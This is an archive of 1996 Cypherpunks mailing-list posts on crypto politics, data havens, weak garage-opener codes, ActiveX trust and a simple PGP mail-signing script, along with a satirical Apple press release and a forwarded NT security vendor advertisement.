      <URL:http://www.io.com/~m101>      * three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 16 Aug 1996 05:43:07 +0800
To: cypherpunks@toad.com
Subject: Schlafly helped defeat ERA, supported Goldwater--where do I sign up?
Message-ID: <ae38a35e01021004be6d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:53 PM 8/15/96, Declan McCullagh wrote:
>Take a look at the Boston Coalition for Freedom of Expression's list of
>enemies of free expression. Excerpt follows.


>Linkname: Phyllis Schlafly, Eagle Forum
>Filename: http://www.eff.org/pub/Groups/BCFE/bcfenatl.html#Schlafly
>
>   Phyllis Schlafly
....
>   "Leading the pro-family movement to victories since 1972." Basic
>   membership includes a subscription to The Phyllis Schlafly Report and
>   costs $15.00. Mrs. Schlafly, whose husband Fred used to head the World
>   Anti-Communist League, is the person considered most responsible for
>   the defeat of the ERA. Her book A Choice Not an Echo, published in
        ^^^^^^^^^^^^^^^^^
>   1964 to support the presidential aspirations of Barry Goldwater, is
                                                    ^^^^^^^^^^^^^^^
>   one of the seminal texts of contemporary American conservative
>   politics.

So, she helped defeat the ERA and supported Goldwater. Sounds pretty good
to me. From this excerpt, I'd call her a friend of liberty.

(Yes, I'm serious. Some of you find it hard to tell when I'm being
completely serious and when I'm being facetious, so I thought I'd clarify
this.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Fri, 16 Aug 1996 06:42:45 +0800
To: cts@deltanet.com
Subject: Re: Jurisdictionless Distributed Data Havens
In-Reply-To: <3212B0CB.1AB7@deltanet.com>
Message-ID: <199608151452.JAA02130@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


[...]
> 
> If one site gets shut down by Big Brother, denial of service attack,
> etc., the other sites either find a new site to replicate the missing
> part to, or they need to reconstruct the data and re-stripe it for the
> remaining servers. (Read any networking book with a section on RAID to
> see what all this means.)

[...]

> 
> The reason data striping is better than a simple mirroring network is
> that no single site contains anything useful in itself for the
> authorities to use against the server maintainer. (Similar to a remailer
> network perhaps)



> 
> An extra feature could be if some major attack was initiated against the
> data haven, there could be a dead-man button of some sort to make the
> data vanish altogether by sending distress signals to the other servers
> (or to at least one server, which could then cascade the signal).

BB would follow the signal and pop another person with conspiracy.

I have been researching this for a while yet, and have a pretty alpha
reference implementation as well as a mailing list exactly on this topic.

The problem with a RAID 5 data haven is that something needs to be the
controller, to put together and store/retrieve the data.  This controller
is in one point, and can be found out.

What BB could do is smash the controller of the RAID array, then press
charges against several of the "hard drive" owners for conspiracy.

I am working on a list for this topic (dh-l@lists.io.com, subscribe on
majordomo@lists.io.com), but I have had problems with getting a the reply
block correct, most likely due to me being very new to majordomo type
lists.

Another problem with this way of a data haven is the way network traffic
gets transfered around.  To have it more anonymous, DC net technology can
be used, but this very hard to implement.

As of now, I am looking for someone who can help me implement a redundant
controller system, so when the DH is contacted, even if the first one if
smashed, the "RAID" stays operable.

Currently, the data haven program just wakes up on input from a .forward
file into its stdin and acts on it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael.tighe@Central.Sun.COM (Michael Tighe SUN IMP)
Date: Fri, 16 Aug 1996 02:27:30 +0800
To: m5@vail.tivoli.com (Mike McNally)
Subject: Re: Crypto Ban Talk @ G-7
In-Reply-To: <321333D4.2003@vail.tivoli.com>
Message-ID: <199608151454.JAA15809@jeep.Central.Sun.COM>
MIME-Version: 1.0
Content-Type: text



>> I have the text of the resolution passed by G-7 and Russia that
>> moves towards greater controls on crypto at:

>I just have to wonder whether these people expect their measures to
>really reduce terrorism, or if they simply expect to be able to
>identify and imprison/kill all the terrorists so that terrorism can 
>be eliminated like smallpox.

I think their theory (like those of the gun and drug banners) is, if it
saves just one life, it is worth it. And if it doesn't, so what?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Fri, 16 Aug 1996 02:00:02 +0800
To: cypherpunks@toad.com
Subject: Re: Schlafly on crypto
Message-ID: <199608151406.HAA07098@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:47 PM 8/14/96 -0700, SANDY SANDFORT wrote:
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

> in this battle, "the enemy of my enemy is my friend."

I appreciate Sandy's enlightened and consistent position.
And I will stand with anyone who supports free speech and privacy.
Forgive my week character however, if I am forced to hold my nose while I
stand with her on this issue.

She is the type of free speach advocate who supports the freedom of those
who agree with *her*.
She is no friend of *mine*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Fri, 16 Aug 1996 04:32:35 +0800
To: soldier@phunc.com (Soldier)
Subject: Re: forget photographing license plates!
In-Reply-To: <Pine.LNX.3.91.960815030333.9859A-100000@phunc.com>
Message-ID: <199608151523.KAA03014@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> > 
> > Hacker's delight.
> > 
> no kidding.. it wouldn't be hard to have something to capture the signal 
> to open the car doors and start the engine.  
> anyhow i wouldn't trust anything to be controled by a radio freq. 
> anyhow.. it never works.. for example the garage door openers (pardon my 
> spelling) people are robbing houses by duplicating the garage door opener 
> signal.
> 
> -soldier
> 

I know one lady get robbed several times by people scanning and
duplicating codes on the garage opener.  There are no garage openers
manufacturers who have a "real" crypto challenge/response system.  Most
just give the code number and the opener verifies that that 8-24 bit code
is correct -- real easy to scan or duplicate.

The key switches/emergency latches are very easy to bypass as well.  The
latch can be pried off and these code things can be pried off and
bypassed with a simple hot wiring.  They don't know anything about tamper
switches.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff@commtouch.co.il (geoff)
Date: Thu, 15 Aug 1996 18:31:39 +0800
To: unicorn@schloss.li
Subject: Re: Fw: Re: Free Pronto Secure Offer
Message-ID: <19960815074728122.AAA103@geoff.commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: unicorn@schloss.li, cypherpunks@toad.com
Date: Thu Aug 15 10:53:53 1996
On 14 Aug unicorn wrote:
 
> "Do all the work I should be doing or have done in the first place
> discover the critical flaws in my new-keen-o-ka-jive-o crypto system
> and I will give you a free copy of a critically flawed crypto system 
> (a $99.00 value) ABSOLUTELY FREE.  Wait, don't order yet.  Included 
> you also get to> actually whitewash my fence and then mow my lawn.  
> All at NO COST to you."

Unicorn, please try to take a minute to think before hitting that send 
key.

You infer that a product is critically flawed without even trying it ?
There are quite a few members of this list who are using Pronto Secure 
and will testify to the contrary. 
See http://www.commtouch.com/testers.htm for a list of people who take 
the trouble to try out a product before venturing an opinion.

Agreed that feedback from external testers is a good deal for 
developers. It is also not a bad deal for evaluators, they get a free 
copy of a product which in the case of Pronto Secure many find useful 
(as witnessed by x-mailer headers on c'punk traffic). Testers also get 
an opportunity to contribute neat feature ideas which helps propagate 
secure messaging to the masses. 

Unicorn, you are invited to whitewash my fence :)


- ---------------------------------------------------------------
Geoff Klein, Pronto Secure Product Manager;   www.commtouch.com 
My PGP public Key 1814AD45 can be obtained by sending a message
to geoff@commtouch.co.il with "Get PGP Key" as the subject.
- ----------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBMhLXlELv5OMYFK1FAQHoCQP/Tg13glNoTAq4OdHJ5tay+x67kpAg3eIn
JwMG/spaV/R5z9iec2wE3BQNWbta2lGF2hZUwkyRNUPX/01024024rg4wp3dIrUQ
gk5vl9hG7kbTIOzLKgyEKvQs8yBs+9A3KfE3HY47vm78qMVF0QE11PECMWubnfg6
be7yL9/U64M=
=923l
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Fri, 16 Aug 1996 04:49:55 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Stealth Buildings Was Re: "X-Ray Gun" for imperceptible   searches
In-Reply-To: <2.2.32.19960815053848.00f05a5c@mail.teleport.com>
Message-ID: <Pine.LNX.3.93.960815104753.1145B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 14 Aug 1996, Alan Olsen wrote:
> At 09:51 PM 8/14/96 -0700, Bill Stewart wrote:
> >[less serious material follows:]
> >[Not only will you need the tinfoil lining to your hat, you'll have
> >to get some metallic-lined underwear to avoid being entrapped into
> >aiding and abetting police pornographers.  Maybe Erik's gold-lame' suggestion
> >will catch on, at least here in San Francisco....]
> Maybe chainmail will come back in style.  (Why does the SNL skit of Dan
> Ackeroid trying to get through the metal detector covered in chains and
> metal fetish gear come to mind...)

     I was  at a convention in Boston last weekend (no, not Macworld) and
there was a Chain Mail Vendor there. Had some interesting stuff, including a
chain mail cat-o-nine tails, and some other stuff...

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.org>
Date: Fri, 16 Aug 1996 06:16:08 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Anguilla - A DataHaven?
In-Reply-To: <m0uqxnq-000rU7C@maki.wwa.com>
Message-ID: <Pine.SUN.3.94.960815104107.8090A-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 15 Aug 1996, Arun Mehta wrote:

> I'm sure this has come up before, but what would prevent a server
> being located on a buoy or something at sea outside territorial
> limits (or when satellites become cheaper, on a satellite itself)
> offering such services?  

Something that I thought would make an excellent data haven would
be older offshore oil platforms, Their size would allow extended
living periods, electrcity and communications are in place, They
are generally built outside of the territorial waters of most
countries to avoid any damage to the shorelines if oil spilled
(possibility for becoming its own country?) and with the hoops
that Shell Oil went through to please Greenpeace with its last
oil platform.  You have to wonder how cheap these could sell 
for just to get them off the oil companies hands? 

Comments or suggestions?

William Knowles
erehwon@c2.org


--
William Knowles    <erehwon@c2.org>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Thu, 15 Aug 1996 21:14:03 +0800
To: "cypherpunks@toad.com>
Subject: RE: Fun with M$
Message-ID: <01BB8A9A.ACAA01C0@mirage.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On 15 August 1996 06:16, Bill Stewart[SMTP:stewarts@ix.netcom.com] wrote:

> >Microsoft has chosen what Sun should have: leave the security to the user,
> >don't take it away from everyone.  Java has been severely crippled by the 
> 
> User?  What user?   The poor unsuspecting fool who hits the web page?
> The kind friendly person who writes web pages that turn off Win95?
> Executing signed code from web pages is semi-ok, if the default is to
> trust no one and make the user explicitly grant permission to code authors.
> Executing anything that comes down the wire is foolish, and writing
> software to do so is rabidly negligent.

The default (at least on beta-2 of ie) is to not trust anyone unless you
explicity say so.  If the user then decides to execute "k3wl kontro1" from
phreak.net then that's their problem.

Does anyone know what the legal implications of signed code are?  That is,
if Company A signs their Active X control and it's later found to corrupt
users data, does the signature (which is supposed to make the user trust
the control as safe), open up the company to litigation for damages?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Fri, 16 Aug 1996 06:56:25 +0800
To: Chris Lee <chrislee@sunspot.tiac.net>
Subject: Re: PGP/Unix scripts, mail proggies?
In-Reply-To: <Pine.SUN.3.95.960808222342.27876A-100000@sunspot.tiac.net>
Message-ID: <Pine.BSI.3.93.960815110720.16514A-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 8 Aug 1996, Chris Lee wrote:

> Hello all,
> 
> 	I joined this list a while ago and am curious whether a there is a
> simple way to encrypt/decrypt e-mail with PGP in a Linux(Unix)
> enviroment...?  Sorry if this has been answered a thousand times, but it
> would really make PGP a more viable option with my small ISP.
> 
> Thank you very much for any answers, please reply to me personally.
> 

Here's what I use, a simple sh script with pine for signing/encrypting.

#!/bin/sh

# Written by:  Jeremey Barrett <jeremey@forequest.com>
#
# Simple as hell sh script for automating PGP. I use pine, and have not
# tried this with any other mailer, but it should work. The version of this I
# use asks all kinds of questions about using remailers and nym servers
# before editing the mail, so it can toss in templates and such. Anyway,
# hack this at will.
#

# Pine configgy stuff I use with this:
# 
#	A)	enable-alternate-editor-cmd
#	B)	enable-alternate-editor-implicitly
#	C) 	signature-at-bottom
#	D)	editor=<full path to this script>

# I would use emacs cept that firing it up for every mail I send would suck
PGPEDITOR='pico -z -t'

# Some echos don't like -n, modify if necessary
ECHOTYPE='echo -n'

# Edit the mail... the mailer shold give us the tmp file as $1
$PGPEDITOR $1

clear

# Annoy with questions
$ECHOTYPE "PGP sign this message? [n] "
read PGP

if [ "$PGP" = "y" -o "$PGP" = "Y" ]
then 

  $ECHOTYPE "PGP encrypt this message? [n] "
  read PGPE

  if [ "$PGPE" = "y" -o "$PGPE" = "Y" ] 
  then
    pgp -east +clearsig=ON $1
    mv $1.asc $1
  else
    pgp -sat +clearsig=ON $1
    mv $1.asc $1
  fi

else

$ECHOTYPE "PGP encrypt this message? [n] "
read PGPE

if [ "$PGPE" = "y" -o "$PGPE" = "Y" ] 
then
  pgp -eat $1
  mv $1.asc $1
fi

fi


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer                        jeremey@forequest.com
The ForeQuest Company                           http://www.forequest.com/

PGP Public Key: http://www.forequest.com/people/jeremey/pgpkey.html
                
		"less is more."  -- Mies van de Rohe.
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhNo0i/fy+vkqMxNAQHwRgP/etGXm06WG7yTVLYYKbwmasezVJX9RScS
kyY4kWornpBQvTRK7VKNAzVH5Pe7lXFtQAL1kpVtuNxwXsZf2tKVzXC8ZwhCF8eZ
poAH6m8pE6d9n2Ft22PTOza6URU+Lx+18D3AoNyEvEQE8xMaMIOno121eiq5/Smk
5BOPFkSuzKM=
=EUq6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 15 Aug 1996 17:17:13 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla - A DataHaven?
Message-ID: <1.5.4.32.19960815051518.00349ecc@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 14/08/96 -0700, Timothy C. May wrote:
>* the role of physical vs. cyberspace data havens
...
>3. Vince seems to be a in a somewhat precarious position, awaiting renewal
>of a one-year work permit.

I'm sure this has come up before, but what would prevent a server
being located on a buoy or something at sea outside territorial
limits (or when satellites become cheaper, on a satellite itself)
offering such services? 

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 16 Aug 1996 04:32:21 +0800
To: The Prisoner <null@void.com>
Subject: Re: photographed license plates
In-Reply-To: <3212B1B0.2327@void.com>
Message-ID: <Pine.SUN.3.91.960815113622.26145B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


There is a new system about to be deployed in the UK that combines GPS 
with cell-phone technology; if the vehicle is stolen it can call the 
anti-theft service and report the location; I belive the vehicle can also 
be remotely immobilised.For the truely paranoid out there, the system is 
known as "SkyNet" :)

Simon
p.s.
  If we're talking about "The Prisoner" and cars, does anybody know 
anywhere I could get a lotus or caterham 7 in the states?



---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Fri, 16 Aug 1996 07:00:22 +0800
To: unicorn@schloss.li
Subject: Re: Fw: Re: Free Pronto Secure Offer
Message-ID: <199608151852.LAA17998@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: unicorn@schloss.li, cypherpunks@toad.com, geoff@commtouch.co.il
Date: Thu Aug 15 13:52:27 1996
> On Wed, 14 Aug 1996, Lou Zirko wrote:

> > PGP.  If I remember, your platform in Linux
> 
> Incorrect.

Sorry about that, I stand corrected.

> 
> > and you should not be so quick 
> > to criticize what you may have not seen.
> 
> I saw his promotional tactic, and that's what I criticized.

This `promotional tactic` was in response to a prior list message asking 
about the offer.  Because of this, I think criticizm was unwarrented.  But 
enough about this.

> 
> > Lou Zirko                                (502)383-2175
> > Zystems                                  lzirko@c2.org
> > "We're all bozos on this bus" - Nick Danger, Third Eye
> 
> --
> I hate lightning - finger for public key - Vote Monarchist
> unicorn@schloss.li
> 
> 
> 

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMhNx/stPRTNbb5z9AQEKdgf/QS/LXvn4IQek4VMbeGaoGd1W+nnJd8Sa
UbxoPp2vog6nwI8mwLQTZtVrhCHSaalW2ykufksrFccDPzCH/nNYkljay4ugVgoe
G31SATr5DS9WSbSmgLa6Ssb+hyYJVQhBhWRVEkd06vBAqxoc6hmlVZKF2YzzBDBA
jZ5hKxWAdRb4dJ72NuzLk09UC5IOKFCd3/a1rcE6ocUTu7w0djIceE+d0+65wLzj
O93F2BndoxLT60RQ/vUTqyoXjnvpdABfyE6r7oAvfOfNjwz6+/V1oyVcFKBUTzDA
17K701IFUYjKzTD7I5JfNVwi69sfwRq0KuQgh/iZNERTJwFt/hQkPQ==
=Ht0y
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gary E. Miller" <gem@rellim.com>
Date: Tue, 20 Aug 1996 22:22:48 +0800
To: ariel@compcurr.com
Subject: 2nd request!
In-Reply-To: <199608131847.LAA01140@mail.compcurr.com>
Message-ID: <Pine.LNX.3.93.960815115338.20280B-100000@ns1.aplatform.com>
MIME-Version: 1.0
Content-Type: text/plain


Yo Ariel!

On Tue, 13 Aug 1996 ariel@compcurr.com wrote:

> *******************************************************
> Inside Currents
> Vol 1, No. 5
> August 13, 1996
> 
> Inside Currents Newsletter
> An electronic update from Computer Currents Interactive
> http://www.currents.net
> 
> *******************************************************
> CONTENTS:
> 
> 1. Tech Support, on and off line:  This week's cover story in Computer
> Currents Magazine
> http://www.currents.net/covr
> 
> 2.  Gigglebytes turns 10!
> http://www.currents.net/gigg
> 
> 3. Check out our online Shopping Mall
> http://www.currents.net/mall
> 
> 4. Computer Catalogs Online
> http://www.currents.net/catalogs
> 
> 5. Coming soon, from Computer Currents Interactive
> 
> 6.  Computer Currents Interactive membership information
> http://www.currents.net/members
> 
> *****************************************************
> 1. Tech Support, on and off line:  
> Do you need help navigating the sea of available tech support resources?
> Read our exclusive Computer Currents cover story for information about 
> third
> party software and hardware support companies who sell phone support, plus
> fee and free online help you can find on the internet.  Also, new in our
> Columns section: "Corporate PC" looks at Post-It Software Notes; "Gizmos"
> explores the chaotic world of videoconferencing; Net Surfer tries Offline
> Web Browsing. 
> 
>        http://www.currents.net/covr
> 
> 
> 2. Gigglebytes turns 10!
> This month Computer Currents magazine celebrates the 10th anniversary of
> Gigglebytes. 
> Join author Lincoln Spector as he revisits his favorite articles over the 
> past
> decade.  Gigglebytes gives readers a humorous view on computer industry 
> events,
> trends and people.  
> 
>        http://www.currents.net/gigg
> 
> 3. Check out our online Shopping Mall
> Our new shopping mall area is still under construction, but we're already
> bringing together an exciting range of regionally based goods and 
> services.
> Of special note: Our Net Quote service allows you to solicit price bids on
> computer equipment--you can let the stores come to you.
> 
>         http://www.currents.net/mall
> 
> 
> 4. Computer Catalogs Online
> If you're thinking of buying a new computer, check out the new section 
> we've
> got up and running!  Now our users can research computer stores in
> their area (or mail order), and browse available hardware listings.  You 
> can
> find local contact numbers with just the click of a mouse!
> 
>         http://www.currents.net/catalogs
> 
> 5. Coming soon, from Computer Currents Interactive
> Discount coupons you can print out and use with local retailers;
> more ways to order online through CCI; our enhanced "Computer Advisor" 
> section;
> stimulating chat rooms and forums; contests and surveys; more FREE stuff.
> 
> 
> 6. Computer Currents Interactive membership
> CCI Membership is FREE and benefits abound! Create and edit your own 
> Gallery
> page,
> post your resume in our Talent Bank, receive special product discounts 
> from
> CCI vendors,
> participate in contests and surveys, and much more! If you're not already 
> a
> member, join CCI today.
> 
>        http://www.currents.net/members
> 
> *****************************************************
> How to subscribe to Inside Currents:
> 
> To Subscribe:
> 1. Join CCI at https://www.currents.net/members
> 2. Check yes to "subscribe to Inside Currents" box.
> 
> To Unsubscribe:
> 
>  1. If you are NOT interested in receiving Inside Currents, cut and paste
> this sentence and e-mail us at
> caliban@compcurr.com. We'll remove your address from our list. Please be
> sure to include your user name.
> 
> 2. If you need further assistance, please send e-mail to 
> ariel@compcurr.com
> 
> 
> *******************************************************
> Computer Currents Interactive   http://www.currents.net
> The full-service online resource for computer users!
> *******************************************************
> 
> 
> 


Please remove me, and my associated companies (aplatform.com, inow.com,
megamed.com, and rellim.com) from your SPAM list.

Do NOT respond to this message in any way.  Just go away!

It is in violation of United States Code, Title 47, Chapter 5, Subchapter II
to send an unsolicited email of any sort in the US.

Check out the following URL for information on your new legal liability:
	http://www.law.cornell.edu/uscode/47/227.html

RGDS
GARY
---------------------------------------------------------------------------
Gary E. Miller Rellim 2680 Bayshore Pkwy, #202 Mountain View, CA 94043-1009
gem@rellim.com  Tel:+1(415)964-1186 Fax:+1(415)964-1176 BBS:+1(415)964-8821





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 16 Aug 1996 06:54:37 +0800
To: cypherpunks@toad.com
Subject: Press Release: Apple's CyberDog Web Bowser
Message-ID: <ae38c2670702100409e3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



*** PRESS RELEASE ***

APPLE COMPUTER UNLEASHES CYBERDOG WEB BOWSER

August 15, CUPERTINO. It may be the dog days of summer to some, but to
Apple, it's the season CyberDog (tm), its new Web bowser, goes into heat.
"CyberDog (tm) is the new dog in town," says Gil Ameliorate, the new leader
of the pack at Apple. "CyberDog (tm) should convince our skeptics that
Apple is not going to the dogs, except on our own terms. We have always
been committed to dogs, as demonstrated by our many Apple and Claris
products named after dogs, including Retriever, Pointer, Finder, and
Setter."

The CyberDog (tm) Bowser (tm) differs from conventional Web browsers by
offering several important features built in the Apple mode. Using the
OpenDog (tm) object-oriented parts system, Apple is delivering CyberDog
with WOOF, the Web OpenDog Object Filer. According to one developer who's
used OpenDog and WOOF, "I especially like the way it gets rid of DO loops
and replaces them with object-oriented DogDoo loops. It's really bitchin!"

The CyberDog (tm) Bowser (tm) offers several additional features, including
a security shell called DogPound (tm), a new speech synthesis system called
OpenDogBark (tm) and an improvement over Netscape's "cookies," which Apple
calls MilkBones (tm).

"We lift our legs and piss on Netscape and Microsoft," said Mr. Ameliorate.
"We are marking our territory with this release of CyberDog. For those who
are dog tired of Netscape and are suffering the lassietude of conventional
Web browsers, our new bowser will be the paws that refreshes."

Spokesdogs at Apple also confirm that Apple plans to directly compete with
Microsoft with an operating system product based on AMD's "K9" chip. The
product, known as "WinDog '97," will appear before Copeland, now delayed to
1999. "We think WinDog '97 will chase that other dog out of town."

Microsoft could not be reached for comment, but a Netscape spokesman said
"Netscape is the cat's meow. That Dog won't hunt. They're barking up the
wrong B-tree."

Those interested in taking CyberDog out for a walk, or just sniffing its
butt, can find further information at:
http://www.banana.com/~farce/OpenDogDoo/

CyberDog, OpenDog, Bowser, WOOF, DogPound, OpenDogBark, MilkBones, and
WinDog '97 are copyrighted terms of Apple Computer, a member of the NASDOG
stock exchange.

(Credit to my friend Paul Engel for coming up with the "bowser" pun which
inspired me to write this. He also was the first to comment while back that
AMD's "K6" clone chip ought to be called the "K9." The rest are mine. I
still use Macintoshes, so take this in the spirit of good fun. I do think,
though, that "CyberDog" is a really stupid name for a product.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 15 Aug 1996 21:53:51 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla - A DataHaven?
Message-ID: <9608151046.AA26467@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Thu Aug 15 12:42:40 1996
> I'm sure this has come up before, but what would prevent a server
> being located on a buoy or something at sea outside territorial
> limits (or when satellites become cheaper, on a satellite itself)
> offering such services? 

Space:
How often does your system crash? (Imagine sending a shuttle up there to 
troubleshoot the server)

Sea:
If your server swims in the ocean I could think of several drawbacks:
- - per satellite only: costs
- - must be very robust (salt water, shocks)
- - must be powered by battery (Hey Jeff, have you ordered the 2000 Alkaline
  batteries yet, I think it's about time to change them on the server)
- - everybody can go and get it (after all, no jurisdiction also means no
  protection - I believe that everybody can claim stuff floating in
  international waters, he just has to get it).

But I like the idea anyway.
But then again, why don't you just buy an island and get the country to 
grant you jurisdictional power over it?

(sounds a lot cheaper than a satellite)


- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMhL/IxFhy5sz+bTpAQE7zggAuCJo0i0X49nmLWtlQ2ZgKcapn80F0z8T
+LJ/5SIjcbfvAZOZHKJVRwjh2GmQjaro4AskgBY4UHg2BTumUlsOiLwXM6hvoCx+
mdd2znkiiWfFarD067Vvur7KTSD87XZWMXR9I/8f1ONzWRdASE/kLQ/azCEgne1P
GO/u0T0kKWWORSVgLc638U9raxJTPmn0Q6vEwvgVU4ARFGAEIPsFN3p8TfbIBAQ5
SqQbzNShqYzHrLgSDiarH2OyHA6o3hghwK1jUs2zHe2bAxvdjzMc3BaodWOi1tlT
DJSq79cTrYItzCK+nn0INtaIeOQy2XwPFEA+1FglIScyxtiPcV0AYQ==
=Xwjf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <win-request@metrics.com>
Date: Fri, 16 Aug 1996 07:41:15 +0800
To: cypherpunks@toad.com
Subject: Win NT - Internet Security Alert (fwd)
Message-ID: <Pine.GUL.3.95.960815124525.10248B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm not approving this for comp.os.ms-windows.announce, but I figure it's
on-topic here (what isn't?). I was intrigued by their "proprietary
procedures to recover Windows NT installation with a lost administrator's
password." 

(The procedure I'd suggest: boot from a DOS or Linux floppy with an NTFS
driver. Back up all the application and data files you want saved. Reformat
the drive, install NT, and restore the saved files.) 

By the way, did you hear the one about the Microsoft tech support
recommendation to put the perl.exe interpreter into a world-executable
directory? www.bugnet.com

-rich

---------- Forwarded message ----------
Date: 15 Aug 1996 19:50:47 GMT
From: MWC@news.ee.net, "Inc. NT Security team" <NTSecurity@box.omna.com>
To: comp-os-ms-windows-announce@uunet.uu.net
Newsgroups: comp.os.ms-windows.announce, comp.os.ms-windows.misc,
    comp.os.ms-windows.networking.misc,
    comp.os.ms-windows.networking.tcp-ip
Subject: Win NT - Internet Security Alert



      *** Win NT / Internet Security Alert ***

      Our survey has shown that more than 50% of NT based Web Sites
do not pay proper attention to Internet security aspects. These sites are
extremely vulnerable, others are vulnerable to some extent.

      We were surprised to find that this relaxed approach to Windows NT /
Internet security does not depend on a size of a company, etc.

      MWC (http:\\www.omna.com\Yes\MWC\) provides unique recovery and
security services for Windows NT based networks connected to the Internet.

      We can help you to make your network truly secure.


      Our services include:


      *** Simulated Intrusion Attack Service ***

      The purpose of the SIMULATED INTRUSION ATTACK Service is to find
potential security holes in a Client's Windows NT 3.5x, 4.0 Operating
Systems Computer and / or Intranet / Internet Windows NT-based network.
For more information please visit:

        http://www.omna.com/yes/mwc/security.htm


      *** NT Security Software ***

      ScanNT . v.1.1 is Windows NT password cracker. More information is
available at:

        http://www.omna.com/yes/AndyBaron/pk.htm


      *** Password Recovery Service ***

      Guaranteed Administrator's password recovery service for Windows
